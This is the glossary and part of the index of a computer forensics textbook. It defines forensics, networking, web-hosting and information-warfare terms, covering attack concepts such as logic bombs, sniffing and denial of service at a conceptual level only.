widely used in the computer forensics community and it generally describes data stored in the
Windows swap file, unallocated space, and file
slack
...

Phrased another way, anomaly detection begins with a positive model of expected system
operations and flags potential intrusions on the
basis of their deviation (as particular events or
actions) from this presumed norm
...
For example, distribute your latest software package by allowing visitors to download it through an anonymous ftp
...

Application
A more technical term for program
...
In the case of an
ftp connection, the application gateway appears as an ftp server to the client and an ftp
client to the server
...

Assurance
A measure of confidence that the security features and architecture of an information system or network accurately reflect and enforce
the given security policy
...

Attack
With specific regard to IW—a specific formulation or execution of a plan to carry out a
threat
...
An active attack alters data
...
Whether an attack
will succeed depends on the vulnerability of
the computer system and the effectiveness of
existing countermeasures
...
Experienced soldiers,
for example, have negative attitudes toward
slovenliness
...
An automated or
manual set of chronological records of system
activities that may enable the reconstruction
and examination of a sequence of events or
changes in an event
...

Autoresponders
Sends an automated email response to incoming
mail sent to a specific address
...
com to get an email explaining
your latest product or automatically reply to orders with a prewritten thank you email message
...
Synonymous with trap door
...
A breach created intentionally for the purpose of collecting, altering,
or destroying data
...
See “Monthly Traffic
...
This can be one,
two, or four chips
...

Basic psyop study (BPS)
A detailed background document that describes
the psyop-relevant vulnerabilities, characteristics,

793

insights, and opportunities that are known about
a specific country susceptible to exploitation
...

Battlespace
The field of military operations circumscribed
by the aggregate of all spatial (geographic
range, altitude) and virtual (communicational
connectivity) dimensions in which those operations are realized
...

Components are determined by the maximum capabilities of friendly and enemy forces
to acquire and dominate each other on the
ground and in the electromagnetic spectrum
...

BIOS
The part of the operating system that provides
the lowest level interface to peripheral devices
...

BLOB
Binary large object used to describe any random large block of bits, usually a picture or
sound file; can be stored in a database but is
normally not interpretable by a database program
...
Can also be used to
hide malicious logic code
...

BMC4I
Battle(space) management command, control,
communications, and intelligence
...
The planning, tasking, and control
of the execution of missions through an architecture of sensors, communications, automation, and intelligence support
...
Because the computer gets itself up and going from an inert state,
it could be said to lift itself up “by its own bootstraps”—this is where the term boot originates
...
Besides this loader
program, the boot record contains the partition table for that disk
...

Bootstrap
To load and initialize the operating system on a
computer
...

Bulletin board
Web-based message forum where visitors can
read, post, and reply to messages or questions
left by other visitors
...
There are busses
both within the CPU and connecting it to exter-

nal memory and peripheral devices
...
e
...

C2
Acronym for command and control
...
” Abbreviation
for command-and-control attack
...

C2 counterwar
Presumed synonym for command-and-control
counterwar
...

C2W
Acronym for command-and-control warfare
...

C3I
Acronym for command, control, communications, and intelligence
...

C4ISR
Acronym for command, control, communications, computer intelligence, surveillance, and
reconnaissance
...


Glossary of Terms and Acronyms

Card
A circuit board that is usually designed to plug
into a connector or slot
...

Center of gravity
A term commonly encountered that connotes a
component or feature of a given system (an adversary’s deployed instrumentality) that is critical to either (a) the viability of that given
system and/or (b) the viability of the supersystem within which that given system is a participating component
...
Supports others in enhancing the security
of their computing systems; develops standardized set of responses to security problems; provides a central point of contact for information
about security incidents; and assists in collecting
and disseminating information on issues related
to computer security, including information
on configuration, management, and bug fixes
for systems
...
It’s
simply a way for your visitor’s computer to
communicate with programs, such as shoppingcart scripts, on your server
...
If you don’t have access
to a CGI-BIN directory, you can’t run programs (scripts) on your Web site
...

CIP
Acronym for critical infrastructure protection
...

Cluster
Windows allocates space to files in units called
clusters
...

A cluster is the smallest unit of disk space that
can be allocated for use by files
...
It also supplies a
real-time clock that keeps track of the date, day,
and time
...

Cold boot
Starting or restarting a computer by turning on
the power supply
...

Computer evidence
Computer evidence is quite unique when compared to other forms of documentary evidence
...
The
legal “best evidence” rules change when it comes
to the processing of computer evidence
...
This
situation creates problems concerning the investigation of the theft of trade secrets (client lists,
research materials, computer-aided design files,
formulas, and proprietary software)
...
The field is relatively new
to the private sector but it has been the mainstay of technology-related investigations and intelligence gathering in law enforcement and
military agencies since the mid-1980s
...
Typically, computer forensic tools exist in the form of computer software
...
The use of different tools that have been developed independently to validate results is important to avoid
inaccuracies introduced by potential software
design flaws and software bugs
...
Cross-validation
through the use of multiple tools and techniques is standard in all forensic sciences
...
Validation through the
use of multiple software tools, computer specialists, and procedures eliminates the potential
for errors and the destruction of evidence
...


Computer investigations
Computer investigations rely on evidence
stored as data and the timeline of dates and
times that files were created, modified, and last
accessed by the computer user
...
The computer forensics investigator should consider timelines of
computer usage in all computer-related investigations
...


Context menu
Also called a “context-sensitive menu,” or a
“shortcut menu,” a context menu includes the
commands that are commonly associated with
an object on the screen
...

Cookies
(Internet browser) Holds information on the
times and dates you have visited Web sites
...

CPU
Stands for central processing unit, a programmable logic device that performs all the instruction, logic, and mathematical processing
in a computer
...
Can be said of
the operating system or a particular program
when there is a software failure
...


Customizable missing docs page
By placing a file in your main directory called
missing
...
You can use
it to steer visitors to your front page, so you
don’t lose them if they click on a bad link
somewhere
...
It actually takes the payment information and sends it via the banking gateways to obtain real-time approvals for credit
cards and checks
...


Data
Representation of facts, concepts, or instructions in a formalized manner suitable for communication, interpretation, or processing by
humans or by automatic means
...
A
representation of facts, concepts, or instructions suitable for communication, interpretation, or processing by humans or computers
...


Data-driven attack
A form of attack that is encoded in seemingly
innocuous data that is executed by a user’s or
other software to implement an attack
...

Datum
Any numerical or geometrical quantity or set of
such quantities that may serve as reference or
base for other quantities
...

DBA
Acronym for dominant battlespace awareness
...

Deception
Those measures designed to mislead the enemy
by manipulation, distortion, or falsification of
evidence to induce him or her to react in a
manner prejudicial to his or her interests
...

Defragment
As modern file systems are used and files are
deleted and created, the total free space becomes split into smaller noncontiguous blocks
...
This degrades performance as multiple seek operations are required
to access a single fragmented file
...
Access speed will be improved as a result of reduced seeking
...
A disk should be defragmented before fragmenting reaches 10%
...
This term is often used to
denote the general set of service impairments
that at the extreme (total degradation to a “zero
state” with respect to the given parameters)
constitutes an absolute denial of service
...


798

Computer Forensics, Second Edition

Denial of service
Actions that prevent any part of an automated
information system (AIS) from functioning in
accordance with its intended purpose
...

However, the term is most often invoked to
connote action against a single host (or set of
hosts), which results in the target’s inability to
perform services for other users— particularly
over a network
...
It is important to note that denial is
delineated with respect to whether the normal
end user(s) can exploit the system or network
as expected
...

Forms of attack not geared to denial per se may
lead to denial as a corollary effect (when a system administrator’s actions in response to an
intrusion attempt lead to a service outage)
...

Denial time
The average length of time that an affected
asset is denied to the organization
...

DII
Acronym for defense information infrastructure
...

Directed-energy protective measures
That division of directed-energy warfare involving actions taken to protect friendly equipment,

facilities, and personnel to ensure friendly effective uses of the electromagnetic spectrum that are
threatened by hostile directed-energy weapons
and devices
...
It acts as a
hierarchy and you will see the directory represented in Windows looking like manila folders
...
The more disk space you have, the bigger your Web site can be
...

DMA
Stands for direct access memory
...

Most devices require a dedicated DMA channel
(so the number of DMA channels that are
available may limit the number of peripherals
that can be installed)
...
acmecatapults
...

DRAM
Dynamic random access memory (see also
“SDRAM”)
...
Dynamic refers to the memory’s memory of storage—basically storing the charge on
a capacitor
...


Glossary of Terms and Acronyms

799

Driver
A program designed to interface a particular
piece of hardware to an operating system or
other software
...
This term
is also (more loosely) used to connote the topical area or task specialization focusing on
achieving this type of protection
...
A subclassification of IW
...
01 micrometers) through far infrared (1,000
micrometers)
...

EIDE
Stands for enhanced integrated drive electronics
...
See also “IDE
...

Electronic warfare
Any military action involving the use of electromagnetic and directed energy to control the
electromagnetic spectrum or attack the enemy
...

Electronics intelligence (ELINT)
Technical and geolocation intelligence derived
from foreign noncommunications, electromagnetic radiations emanating from sources other
than nuclear detonations or radioactive sources
...

Email accounts (POP3)
Your email boxes on a server that can be accessed directly to retrieve your mail using such
programs as Outlook Express and Netscape
Mail
...

Email aliases
Your main POP account for your domain allows the system to capture any name that may
be sent to your domain name
...
com is proper, any
name in front of it will be delivered to your
main POP account
...

Email forwarding
Any email address at your domain may be configured to forward to any other real internet email
address
...
com
can forward to you@aol
...

Email mini mailing lists
Can be used to send your customers news and
updates about your product or services without
emailing each one separately
...
You send one email and it goes
to every email address on the list
...

Entrapment
The deliberate planting of apparent flaws in a
system for the purpose of detecting attempted
penetrations
...

Executable
A binary file containing a program in machine
language that is ready to be executed (run)
...
exe for these files
...
See also “Adapter
...

Typically, to view the contents of a compressed
file, you must extract it first
...

File
A collection of data grouped into one unit on
a disk
...
The FAT is a critical
file: you should be sure to back it up regularly
...
The older
FAT (FAT16) can only support partitions up
to two gigabytes in size
...

File slack
File slack potentially contains randomly selected bytes of data from computer memory
...
” Clusters are made up of blocks of sectors
...

This randomly selected data from memory is
called “RAM slack” because it comes from the
memory of the computer
...
Thus, if the
computer has not been shut down for several
days, the data stored in file slack can come
from work sessions that occurred in the past
...

Firewall
A metaphorical label for a set of hardware and
software components protecting system resources (servers, LANs) from exogenous attack
via a network (from Internet users) by intercepting and checking network traffic
...
For LAN installations of any
size, the typical approach is to install one or more

Glossary of Terms and Acronyms

computers positioned at critical junctures (gateways) and dedicated to the firewall functions
...
The firewall’s own internal connection into the protected domain is
typically the focus of monitoring functions
...
The typical firewall is an inexpensive
micro-based Unix box kept clean of critical data,
with numerous modems and public network
ports on it but only one carefully watched connection back to the rest of the cluster
...

Firmware
Software contained in a read-only memory
(ROM) device
...

Fishbowl
A defensive IW tactic in which a suspicious or
unauthorized user is permitted to continue established access to the protected system or network, but whose interactions with that system or
network are (unknown and unapparent to the
subject) encapsulated within a secure domain of
operations (rerouted to an isolated computer or
redirected to a dummy environment simulating
an actual server) so that IW defenders can observe and analyze the user’s intentions, tactics,
and identity
...


801

Fog of war
The aggregate of factors that reduce or preclude
situational certainty in a battlespace
...

Code that can be written in one line of code on
any Unix system; used to recursively spawn
copies of itself, explode, and eventually eat all
the process table entries
...

Formmail
Use formmail to email the contents of forms on
your Web page to you when a visitor fills it out
...
Fragmented files are
slower to read than unfragmented files
...

Friction (of war)
The aggregate of factors and events that reduce
or degrade operational efficiency (and hence
effectiveness) in the real world of war-making
...

FrontPage extensions
FrontPage is Microsoft’s simple Web-page editor designed for nonprogrammers
...
You should
either plan to use CGI-based applications or

802

Computer Forensics, Second Edition

FrontPage
...


Heat Sink
A mass of metal attached to a chip carrier or
socket for the purpose of dissipating heat
...
You have unlimited access to
your account 24 hours a day
...


Hijacking
A term (typically applied in combination with
another) to connote an action to usurp activity
or interactions in progress
...


Global information environment
All individuals, organizations, or systems, most
of which are outside the control of the military
or national command authorities, that collect,
process, and disseminate information to national and international audiences
...

Hacker
The label “hacker” has come to connote a person who deliberately accesses and exploits
computer and information systems to which he
or she has no authorized access
...
“A great hack” was a
common compliment for an especially cunning or innovative piece of software code
...
Over time, cracker
faded from usage and hacker came to subsume
its (unfortunate) connotations
...


History
(Internet browser) Stores the internet addresses
(URLs) of the Web sites you have visited
...

I2WAR
Acronym for infrastructural and information
warfare
...
I/O is the communication between a computer and its user,
its storage devices, other computers (via a network), or the outside world
...

I&W
Acronym for indications and warnings
...
Typically, indications and warnings connotes a
summarization or fusion of raw data into a
synopsis of current threat conditions (a report
from an intel unit)
...
This label is occasionally
used to connote the summarization of incoming data with respect to threat conditions (extant or predicted)
...

IDE
Stands for integrated drive electronics
...
See also “EIDE”
...

IDW
Acronym for information-dominance warfare
...

Indications and warning(s) (I&W)
Those intelligence activities intended to detect
and report time-sensitive intelligence information on foreign developments that could involve a threat to the United States or allied
military, political, or economic interests or to
U
...
citizens abroad
...
S
...

Indirect information warfare
Changing the adversary’s information by creating phenomena that the adversary must then
observe and analyze
...
Synonymous with second-wave warfare
...
The meaning that a human assigns to
data by means of the known conventions used
in their representation
...

Information Age
A label generally used to connote the present
or prospective era in which information technology (IT) is the dominant technical artifact
...

Information Age warfare
That subset of war-making that uses information technology as a tool to impart combat operations with unprecedented economies of
time and force
...

Information attack
Directly corrupting information without visibly changing the physical entity within which it
resides
...

Information-based warfare (IBW)
Synonym for information warfare
...


804

Computer Forensics, Second Edition

Information collection
That aspect of IW activities concerned with the
acquisition of data
...

Information collection includes the entry points
for information into an organization from
both internal and external sources
...

Business examples of collection systems include point-of-sale (POS) systems, market
surveys, government statistics, and internal
management data
...

Information compromise
That class or type of IW threat that involves a
competitor gaining access to an organization’s
proprietary data
...

There are two types of denial: direct attacks on
the adversary’s information systems, and providing misinformation to its systems to deceive
and induce the adversary to take actions that
are not to its advantage
...
Besides direct attacks,
there are safer ways to corrupt an adversary’s
databases
...

Information destruction
That class or type of IW threat to one’s data assets that involves the loss of these data (or loss
of access to these data) as the result of a hostile
attack by an adversary
...

Information dominance warfare (IDW)
The subcategory of information warfare (IW)
aimed at leveraging data, information, and
knowledge to tactical and strategic advantage,
as opposed to leveraging the media, channels,
and vehicles of information transfer and processing
...

Information function
Any activity involving the acquisition, transmission, storage, or transformation of information
...

Information operations
(also information ops)
This term is typically encountered in IW discussions as a label for those concrete tasks and
activities by which one pursues one’s own
interests in the information realm
...

Information ops (also “info ops”)
Synonym for information operations
...
S
...


805

Information system(s) (INFOSYS)
The entire infrastructure, organization, personnel, and components that collect, process,
store, transmit, display, disseminate, and act on
information
...
Compromise involves a competitor gaining access to an organization’s proprietary
data
...


Information systems security
A synonym for INFOSEC
...


Information realm
A commonly used term to denote the virtual
space of data networks, contents, and commerce
...


Information security (INFOSEC)
The protection of unauthorized access to or
modification of information, whether in storage, processing, or transit, and against the denial of service to authorized users or the
provision of service to unauthorized users, including those measures necessary to detect,
document, and counter such threats
...


Information superiority
That degree of dominance in the information
domain that permits the conduct of operations
without effective opposition
...
It includes the capability for near-real-time awareness of the location
and activity of friendly, adversary, and neutral
forces throughout the battlespace and a seamless, robust C4I network linking all friendly
forces that provides common awareness of the
current situation
...
The speed with which this is done
affects the timeliness of the data availability and,
therefore, the responsiveness of the organization
to situations
...

Information war
Activities intertwined with, and superimposed
on, other military operations, exploiting data
and information in support of traditional military tasks such as command and control
...
Subcategories of information
warfare can be differentiated into two general
classes: (a) those aimed at leveraging the vehicles of information transfer or processing
(information systems warfare [ISW]) and (b)
those aimed at leveraging the informative content or effect of such systems
...
IRQ is the name of
the hardware interrupt signals that PC peripherals (such as serial or parallel ports) use to get
the processor’s attention
...
Peripherals that
use interrupts include LAN adapters, sound
boards, scanner interfaces, and SCSI adapters
...
You can
provide it just for fun or use it to interact with
your customers in real-time
...
When
in place, the jumper connects the pins electronically and closes the circuit, turning it on
...

Key communicator
An individual or group having the economic,
social, or political power to persuade the individuals or groups with which he or she interacts to change or reinforce existing opinions,
emotions, attitudes, and behaviors
...
A specialized form of audit
trail software, or a specially designed device,
that records every key struck by a user and
every character of the response that the host
computer returns to the user
...
This approach to
knowledge explicitly ties it to the processes of
both education and inaction with respect to the
given operational environment and hence links
it to one or more specific actors in that given domain
...

Knowledge-based warfare
The ability of one side to obtain essential and
key elements of truth while denying these same
elements of truth to the other side
...
The end game is a complete pictorial representation of reality that the decision
maker can tune to his or her unique needs at
any given time
...

Knowledge dominance
In warfare, an operational advantage (vis-à-vis
an adversary) in exploiting information to
guide effective action
...

Knowledge war
A synonym for IW, or third-wave war
...

Letter bomb/letterbomb
Malicious or disruptive code delivered via an
email message (or an attachment to said message)
...
Under UNIX, a letterbomb can also try to get part of its contents
interpreted as a shell command to the mailer
...

Logic bomb
The term for a mischievous or destructive piece
of software (virus, trojan horse) that lies resident on the victim computer or system until
triggered by a specific event (onset of a predetermined date or set of system conditions)
...

Mail bomb/mailbomb
Unlike a logic bomb (a thing), mail bomb is a
verb used to connote deliberately deluging a
target system or host with email messages for
purposes of harassment, degradation of service,
or even denial of service
...
Any large amount of incoming
email sufficient to disrupt or bog down normal
local operations
...


807

Majordomo list
This is a very flexible tool for allowing your
clients to interact with each other by email
...
Majordomo lists
usually focus on a particular topic of common
interest, such as dried flower arranging, forensics, or anything that people can share information or talk about
...
Each list can email up
to 1,500 emails per day
...

Measurement and signature intelligence
Scientific and technical intelligence obtained
by quantitative and qualitative analysis of data
(metric, angle, spatial, wavelength, time dependence, modulation, plasma, and hydromagnetic) derived from specific technical sensors
for the purpose of identifying any distinctive
features associated with the source, emitter, or
sender and to facilitate subsequent identification and measurement of the same
...

Message
Any thought or idea expressed briefly in a
plain or secret language and prepared in a
form suitable for transmission by any means
of communication
...


808

Computer Forensics, Second Edition

Military deception
Actions executed to deliberately mislead adversary military decision makers as to friendly military capabilities, intentions, and operations,
thereby causing the adversary to take specific
actions (or inactions) that will contribute to
the accomplishment of the friendly mission
...

Military information function
Any information function supporting and enhancing the employment of military forces
...
It denotes the phenomenon of extreme
transformations in warfare occurring as a result of the exploitation of technology
...

Minimum essential information
infrastructure (MEII)
A label for the least set of own-force information assets that can serve to support a given
mission or operation
...
Mirror image backups exactly replicate all sectors on a given storage device
...
Such backups are
sometimes referred to as “evidence grade back-

ups” and they differ substantially from standard file backups and network server backups
...

Mockingbird
A computer program or process that mimics
the legitimate behavior of a normal system feature (or other apparently useful function) but
performs malicious activities once invoked by
the user
...
Each time a Web page, image, audio,
video, or other element of your Web site is accessed by your visitor, traffic is generated
...
It accepts expansion devices such as sound and network cards
and modems
...

MTR
Acronym for military technical revolution
...
S
...


Glossary of Terms and Acronyms

Navigation warfare (NAVWAR)
A term for activities directed toward disrupting, degrading, or denying the adversary’s capabilities for geographical location, tracking,
and control (navigation) based on such capabilities
...

Netwar
A synonym for cyberwar
...
The reason
for doing this is that systems tend to operate
within a group of other “trusted” systems
...
Implied with this
trust is that the system administrator of the
trusted system is performing his or her job
properly and maintaining an appropriate level
of security for his or her system
...

Network worm
A worm that migrates across platforms over a
network by copying itself from one system to
another by exploiting common network facilities, resulting in execution of the (replicated)
worm on that system and potentially others
...

NTFS
Windows NT file system
...

OODA loop (also O-O-D-A loop)
Observation, orientation, decision, action loop
...
Disruption or other
damage to the OODA loop is a common way of
portraying the goal or main effect of IW
...
Examples include humanitarian and
police actions
...

Operational intelligence
Intelligence that is required for planning and
conducting campaigns and major operations to
accomplish strategic objectives within theaters
or areas of operations
...

Opinion
A view, judgment, or appraisal formed in the
mind about a particular matter or particular
matters
...
It may be more influenced
by attitudes than facts
...

OSINT
Acronym for open-source intelligence
...

Packet sniffing
Packet sniffing is a technique in which attackers surreptitiously insert a software program at
remote network switches or host computers
...

By picking up the first 125 keystrokes of a connection, attackers can learn passwords and user
identifications, which, in turn, they can use to
break into systems
...
Each partition normally has its own file system
...
The partition table describes to the operating system how the hard
disk is divided
...
The
partition table is always stored in the first physical sector of a disk drive
...
Attack that does not result in an unauthorized
state change, such as an attack that only monitors or records data
...

A type of threat that involves the interception,
not the alteration, of information
...
Users often select weak passwords
...
Password cracking and theft is a technique in which attackers try to guess or steal
passwords to obtain access to computer systems
...
For example, if the password is a dictionary word, a computer can quickly look up all possibilities to find
a match
...
However, even with complex passwords,
powerful computers can use brute force to
compare all possible combinations of characters until a match is found
...

Path
A location of a file
...
A
path can identify a drive (C:\), a folder
(C:\Temp), or a file (C:\Windows\ftp
...


Glossary of Terms and Acronyms

Penetration
With regard to IW, a successful attack—the
ability to obtain unauthorized (undetected) access to files and programs or the control state of
a computer system
...

Perception
The process of evaluating information that has
been received and classified by the five physical
senses (vision, hearing, smell, taste, and touch)
and interpreted by criteria of the culture and
society
...
In various ways, perception management combines truth projection, operations security, cover and deception,
and psychological operations
...
For example, disks, keyboards, monitors, mice, printers,
scanners, tape drives, microphones, speakers,
and other such devices are peripherals
...
Formed by a play on
both phreaker and hacker
...

When the intrusion or action involves both
telephone and data communications networks, that portion of the intrusion activity
directed toward manipulating the telephone
system is typically called phreaking
...

Commonly, an individual who uses his or her
knowledge of the telephone system to make
calls at the expense of another
...
PnP
cards generally have no switches or jumpers but
are configured via the PnP system’s BIOS or
with supplied software for non-PnP computers
...
Each time a PC
initializes, the BIOS executes a series of tests
collectively known as the POST
...
If a fault is
detected, the POST reports it as an audible series of beeps or a hexadecimal code written to
an I/O port
...
A data-storage device for which
the order of access to different locations does
not affect the speed of access
...


812

Computer Forensics, Second Edition

The most common form of RAM in use today
is built from semiconductor integrated circuits, which can either be static (SRAM) or dynamic (DRAM)
...
Generally, the visitor will see a
different message every time they visit the site
...
Graphical stats are a detailed graphical
and tabular view of your Web site’s traffic
grouped by weeks, days, and hours in an easy to
read format
...

Retro-virus
A virus that waits until all possible backup
media are also infected, so that it is not possible
to restore the system to an uninfected state
...
The current
RMA is an instance of a military technical revolution (MTR)
...


Risk
With specific regard to data or information systems—accidental or unpredictable exposure of
information, or violation of operations integrity because of the malfunction of hardware
or incomplete or incorrect software design
...

ROM
Read-only memory
...
The term is most often applied to
semiconductor-integrated circuit memories
...
It is used in
part for storage of the lowest level bootstrap
software (firmware) in a computer
...

Scavenge/scavenging
Searching through object residue (discarded
disks, tapes, or paper) to acquire sensitive data
without authorization
...
For example, a Perl script counts the visits to the
page, and a JavaScript script makes the buttons
change colors when you put your mouse
pointer over them
...

SCSI
Stands for small computer system interface
...


Glossary of Terms and Acronyms

SDRAM
Stands for synchronous dynamic random
access memory (see also “DRAM”)
...

Search engine
A CGI script that allows visitors to perform
keyword searches of a Web site
...

Sector
The tracks on a disk are divided into sectors
...

Secure server (SSL)
One method of ensuring that information entered through your Web site is protected
...
This is most
commonly used for credit card transactions
...

Security audit
A search through a computer system for security problems and vulnerabilities
...


813

Security classification
A category to which national security information and material is assigned to denote the degree of damage that unauthorized disclosure
would cause to national defense or foreign relations of the United States and to denote the
degree of protection required
...
This is usually done by pointing to an item with the screen pointer and then
quickly pressing and releasing the left mouse
button once
...
A loose descriptor for the scope of
processing for intrasystemic functions to obtain advantage in a theater of operations
...

Some servers even have two or more processors working together
...

Server side includes (SSI)
Allows the server to understand and respond
to special page commands
...
On each page you
put a simple include to read the file and place it

814

Computer Forensics, Second Edition

at the bottom of the desired pages
...


Simple counter
Graphical count of visitors to your Web site,
which appears on your Web page
...


Site submission
Submits your site information to a database of
over 1,900 search engines, link engines, and
directories
...

Shopping cart
Keeps track of what your customers have ordered online as they add and remove items
...

SIGINT
Acronym for signals intelligence
...

Signal security (SIGSEC)
A generic term that includes both communications security and electronic security
...

SIGSEC
Acronym for signal security
...

The perception of the elements in the environment within a volume of time and space, the
comprehension of their meaning, and the projection of their status in the near future
...

As such, it connotes a degree of orientation to
those circumstances at that point in time—
particularly those that are germane to the task
itself
...
As such, the notion of situation
awareness maps straightforwardly onto the orientation phase of the OODA Loop
...

Sniff/sniffing
The act of surreptitiously monitoring data
streams so as to intercept and capture exploitable
information
...
A program
to capture data across a computer network
...
A software tool that audits and
identifies network traffic packets
...

This is something of a catch-all category for
any tricks used to obtain the intended access or
to obtain information critical to achieving that
access
...

SOS
Acronym for system of systems
...
This term is also pejoratively applied
to describe the perceived harassment of receiving profligately broadcast data (junk email advertising)
...
Also, to cause a person or newsgroup to be flooded with irrelevant or inappropriate messages
...

System registry
The system configuration files used by Windows 2000, XP, 2003, and NT to store settings
about user preferences, installed software,
hardware and drivers, and other settings re-

815

quired for Windows to run correctly
...
When the registry becomes “broken,” it
can cause serious system problems
...

TECHINT
Acronym for technical intelligence
...

Technical intelligence (TECHINT)
Intelligence derived from exploitation of
foreign materiel, produced for strategic, operational, and tactical level commanders
...
The item is then exploited at succeedingly
higher levels until a countermeasure is produced to neutralize the adversary’s technological advantage
...
Most CGI scripts can be
installed without Telnet unless you need it for
debugging purposes
...

An attack hacker can send and receive terminal
I/O while a user is on the terminal
...

Usually terminators are hardware circuits or
jumpers
...
The allusion is to Toffler’s “Third Wave” of economic
activity, which concentrates on information
and knowledge as raw material and product
...

Time bomb
A logic bomb that is specifically triggered by a
temporal event (a predetermined date or time)
...
A
variant of the trojan horse, in which malicious
code is inserted to be triggered later
...

Trap door
A hidden software or hardware mechanism
used to circumvent security control
...
The data-storage area in a
factory-fresh hard disk drive typically contains
patterns of sectors that are filled with patterns
of format characters
...
The format pattern is overwritten as files and subdirectories are
written in the data area
...

UUencode
Many file formats are 8-bit (also called binary),
which means the basic unit of information—a
byte—comprises 8 on/off signals
...
UUencoding compensates for this restriction by converting 8-bit
data to 7-bit data
...
The data are then emailed and received by someone who must UUdecode it
...


Vandal
As contrasted with crackers and criminals in a
tripartite taxonomy of cyberspace intruders,
this term is used to denote anyone whose goal
is to destroy information and information systems in the course of their intrusion attempts
...


Video adapter
An expansion card or chip set built into a
motherboard that provides the capability to
display text and graphics on the computer’s
monitor
...
If it is a chip set on the
motherboard, the video connector will be on
the motherboard also
...
In this
usage, the term is synonymous with cyber
medium, cyberspace, and infosphere
...

Virus
The generic label for a unary set of code that is
designed to cause mischief or other subversive
effect in a target computer system
...

War
An event characterized by the open, total, and
(relatively) unrestricted prosecution of warfare
by lethal means
...

War dialer
A cracking tool, a program that calls a given list
or range of numbers and records those that answer with handshake tones (and so might be
entry points to computer or telecommunications systems)
...
The distinction between this
and war ties into the delineation of information warfare as an activity, which could or

817

should be conducted outside the situational
frame of war itself
...
See also “Cold boot
...
There’s no need for any other applications or software
...
The storage area is important to the
computer forensics specialist for the same reason that file slack and unallocated space are important (large volumes of data exist for which
the computer user likely has no knowledge)
...
Permanent swap files are of more interest
to a computer forensics specialist because they
normally store larger amounts of information
for much longer periods of time
...

World Wide Web
The World Wide Web, or WWW, is the part of
the Internet that you use to view a particular
Web page
...
Telnet, FTP,
Veronica, and Archie are some other Internet
data-transfer protocols
...


818

Computer Forensics, Second Edition

Worm
A class of mischievous or disruptive software
whose negative effect is primarily realized
through rampant proliferation (via replication
and distribution of the worm’s own code)
...

Worm code is relatively host-independent, in
that the code is self-contained enough to migrate across multiple instances of a given platform, or across multiple platforms over a
network (network worm)
...
A program or executable code
module that resides in distributed systems or
networks
...
Such
resources may take the form of CPU time, I/O
channels, or system memory
...


Zip
To zip (notice the lower case z) a file is to compress it into an archive so that it occupies less
disk space
...
When used as a noun, Zip is typically capitalized
...

Zip file
A Zip archive that Windows presents as a single
file
...


Index
3COM Corporation, 293
8lgm, 791
12WAR defined, 802
802
...
See also Internet, abuse, detection of
Acceptable level of risk, 791
...
Caruth et al, 319
American Fundware, Inc
...
v
...
See Application service providers
(ASPs) and network security
Assurance, 792
Asynchronous attacks, 792
Attack, 792
Attackers, identifying, 161, 167–172,
186, 453–459
Attacks
archived postings, accessing, 171
data-driven, 107, 797
information, 803

from inside, 161–162
investigating, 97, 586, 658–660
leapfrog, 806
packet-level, 98
passive, 810
reconstructing, 229
responding to, 159–160
technical, 815
types of, 338, 470, 476–477, 504
wireless, 115–116
Attitudes, 792
...
See Surveillance,
electronic
Bulletin board, 794
Bus defined, 794
Business technology, types of, 52–61
...
See Command and control
warfare (C2W)
C3, 794
C3I, 794
C4I (Command, control, communication, and computer intelligence),
495, 794
C4ISR, 794
Cache defined, 795
Call counting, 612
Calling patterns, tracking, 613
Campaign for Defense of Legitimate
Rights (CDLR), 416–417
Card defined, 794
Carnivore software, 528–529, 552
Cartridges, information stored on, 272
Caruth et al, American Bankers Insurance Company of Florida v
...
See Comprehensive emergency
management procedures (CEMP)
Censorship and encryption, 637–638
Center for Democracy and Technology, 711
Central processing unit (CPU), 796
Ceramics, piezoelectric in simulation
of movement, 537
CERT/CC (CERT Coordination
Center), 266, 267, 654, 795
Certificate authorities
described, 262–263
in identity verification, 89
Certified information systems security
professional (CISSP), 173, 174,
175, 675
Certified Internet Webmaster (CIW),
173
CESA (Cyberspace Electronic Security
Act), 494, 552
CFIRP
...
See Computer Forensics
Experiment 2000 (CFX-2000)
CGI-BIN, 795
CGI email, 795
Chain of custody
defined, 247
documentation, 321, 695
establishing, 18, 19, 65
and evidence notebooks, 250
in evidence preservation, 228–229,
236, 251, 255, 679–680
maintaining, 281, 282
Charlemagne Hammer Skins, 420
Chemical agents in terrorism, 402–403,
427–428, 431
Chicago Convention, 596
Chief Information Officers (CIOs)
functions of, 294–296, 299–300
in security policy implementation,
270, 424
Children
exploitation of, evidence gathering
in, 13
protecting, 128, 232, 535
tracking, 564
China
...
See Certified information
systems security professional
(CISSP)
Civil communication in society, 349
Civilian Casualties: The Victims and
Refugees of Information Warfare
Checklist Form, 776
Civilians
in IW, 585–587, 618–619
networks, protecting, 544
Civil litigation
case studies, 723, 724
and computer forensic specialists,
8, 18, 31, 166
electronic evidence in, 20, 74, 279
and email, 10, 319
sources of, 30–31
CIW
...
com, 597
COCOM (Coordinating Committee
for Multilateral Strategic Export
Controls), 638
Code, malicious, 358, 642
Cold boot defined, 795
Cold war mentality, limitations of,
378–379
Collaborations in IW preparation,
375–376
Collaborative Virtual Workplace
(CVW), 543, 544, 545
Collection of biometrics, 142
Command, control, communication,
and computer intelligence (C4I),
495
Command and control warfare (C2W)
applied, 383, 410
described, 380–383, 409, 794
Communications
attacking, 351, 516–517
identifying, 50
and LBS, 551
and psyops, 367
systems in IW, 586
truth in, 348–350
Company private information defined,
85
Comparison/matching of biometrics,
142

Competition Act, 283
Comprehensive emergency management procedures (CEMP), 144
Computer and Internet Security
Resources, 713
Computer Associates International,
Inc
...
American Fundware, Inc,
320
Computer clocks, mechanism of, 289
Computer crime
evolution of, 4, 287, 310
financial gains, average, 5
investigating, 155
overview, 5–6, 154–155, 184
prevalence, 153, 681
regulating, 358–359
resources, 711
Computer Crimes and Technology
Links, 713
Computer evidence defined, 795
...
See Computer crime
Cyberdisarmament, proponents of,
363
CyberEvidence, 783
Cyber forensics
...
See also Information
warfare (IW)
described, 340–341, 380
disadvantages, 341
military strategy in, 350–354,
359–360, 371–374, 376–377,
392–394, 580
D
DARPA agent markup language
(DAML), 374–375
DARPA (Defense Advanced Research
Projects Agency) on IW capabilities, 354, 372–373, 588
Data
ambient, 792
archiving, 198
compression, 180
converting, 304–310
copy process, characteristics of, 250
defined, 797
distribution, impact of, 570–573
duplication/preservation of, 11,
15–16, 163–164, 185
encryption, 51, 64–65 (See also
Encryption)
erasure
case histories, 26–27
discovering, 52, 71, 95, 180
exporting, 106
hiding techniques, 43, 51–52, 71,
178, 206–209, 297–298, 498
identification of, 287–288
persistence, 213, 496
protection measure tips, 488, 683,
706–707
recovery (See Data recovery)
